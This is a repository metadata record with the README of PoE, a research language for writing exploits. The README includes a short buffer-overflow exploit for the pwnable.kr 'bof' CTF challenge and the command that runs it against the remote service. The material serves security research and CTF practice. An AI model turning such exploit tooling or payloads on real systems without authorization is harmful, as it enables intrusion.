{"id":18925179,"url":"https://github.com/b2r2-org/poe","last_synced_at":"2025-10-06T00:32:15.287Z","repository":{"id":244726396,"uuid":"785047701","full_name":"B2R2-org/PoE","owner":"B2R2-org","description":"PoE (Proof-of-Exploit) is a language designed specifically for writing an exploit.","archived":false,"fork":false,"pushed_at":"2024-12-23T09:11:32.000Z","size":77,"stargazers_count":4,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-12-23T10:20:20.325Z","etag":null,"topics":["ctf","exploit","fsharp","hacking","poe","programming-language"],"latest_commit_sha":null,"homepage":"","language":"F#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/B2R2-org.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.md","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-04-11T04:51:07.000Z","updated_at":"2024-12-23T09:10:16.000Z","dependencies_parsed_at":null,"dependency_job_id":"d9beda8b-db64-4217-86df-fea4d53c8f7b","html_url":"https://github.com/B2R2-org/PoE","commit_stats":null,"previous_names":["b2r2-org/poe"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/B2R2-org%2FPoE","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/B2R2-org%2FPoE/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/B2R2-org%2FPoE/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/B2R2-org%2FPoE/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/B2R2-org","download_url":"https://codeload.github.com/B2R2-org/PoE/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":232015496,"owners_count":18460651,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ctf","exploit","fsharp","hacking","poe","programming-language"],"created_at":"2024-11-08T11:09:51.287Z","updated_at":"2025-10-06T00:32:15.281Z","avatar_url":"https://github.com/B2R2-org.png","language":"F#","funding_links":[],"categories":[],"sub_categories":[],"readme":"PoE\n===\n\nPoE (Proof-of-Exploit) is a language designed specifically for writing an\nexploit. It provides intuitive and concise syntax, which makes exploit\ndevelopment easy and fun. For more details, please refer to our paper:\n+ [Jung Hyun Kim, Steve Gustaman, and Sang Kil Cha. (2024), PoE: A Domain-Specific Language for Exploitation. In Proceedings of the Silicon Valley Cybersecurity Conference.](https://softsec.kaist.ac.kr/~sangkilc/papers/kim-svcc24.pdf)\n\nCurrently, PoE runs on an interpreter that we call `PoE.Replayer`, which is a\n[.NET CLI\ntool](https://docs.microsoft.com/en-us/dotnet/core/tools/global-tools). See the\n[tutorial](tutorial) to learn more about PoE and `PoE.Replayer`.\n\n## Features\n\n+ Static typing\n+ Simple and intuitive grammar for writing readable exploits\n+ Language-level integration of SMT solving and inline assembly capability\n+ Bit-vector manipulation\n+ Various built-in functions\n+ Automated `stdbuf` patching\n\n## Installation\n\nPoE supports major OSs including Windows, MacOS, and Linux distributions. And\nyou can easily install the released version of PoE via .NET.\n\n### Prerequisite\n\n+ [.NET 9+](https://dotnet.microsoft.com/en-us/download)\n\n### Instruction\n\nFirst, make sure you have installed .NET 9+ on your machine so that you can run\nthe command `dotnet` from your terminal.\n\nNext, just run the following command to install `PoE.Replayer`:\n```\ndotnet tool install --global PoE.Replayer\n```\n\nAfter the installation, you should be able to run the command `poe` on your\nmachine. If so, you are all set.\n\n### From source code\n\nInstead of running the released version of PoE, you can also clone the latest\nsource code of PoE and run it directly:\n```\ngit clone https://github.com/B2R2-org/PoE\ncd PoE\ndotnet run --project src/PoE.Replayer\n```\n\n## How to use\n\nBasically, PoE supports two modes to interact with the target system:\n+ Local mode: It runs the local binary to communicate with it.\n+ Remote mode: It communicates with the remote service running on the specific\nIP address and port number.\n\nYou can use either **Local mode** or **Remote mode** via the following commands:\n\n+ Local mode: `poe stdin [replay options] \u003cPoE\u003e \u003cbin path\u003e [args]`\n+ Remote mode: `poe net [replay options] \u003cPoE\u003e \u003cip\u003e \u003cport\u003e`\n\nAlso, we provide another way to connect to the remote service via **SSH mode**,\nwhere you can specify the username and password to log in to the remote host via\nSSH:\n\n+ SSH mode: `poe ssh [replay options] \u003cPoE\u003e \u003cip\u003e \u003cport\u003e \u003cuser\u003e \u003cpassword\u003e`\n\nRunning the PoE replayer without any parameters will show the other usages of\nPoE.\n\n### Example usage\n\nLet us bring here an example CTF problem named `bof` from\n[pwnable.kr](pwnable.kr). This problem has a buffer overflow vulnerability, and\nyou can easily write its exploit via PoE:\n\n```\nact exploit():\n    bv payload = \"A\"x(0x2c + 0x8) . 0xcafebabe:u32 . \"\\n\"\n    write(\"nc 0 9000\\n\")\n    write(payload)\n    write(\"cat flag\\n\")\n    return read(-1)\n\nsubmit:\n    return exploit()\n```\n\nAnd then, you can run the following command to run the exploit on the remote\nservice:\n```\npoe ssh bof.poe pwnable.kr 9000 bof guest\n```\nNote that you can also use Remote mode (`net`) when you connect to the remote\nservice using the other ways (e.g. via `nc`).\n\nFor more details, please see the [tutorial](tutorial).","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fb2r2-org%2Fpoe","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fb2r2-org%2Fpoe","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fb2r2-org%2Fpoe/lists"}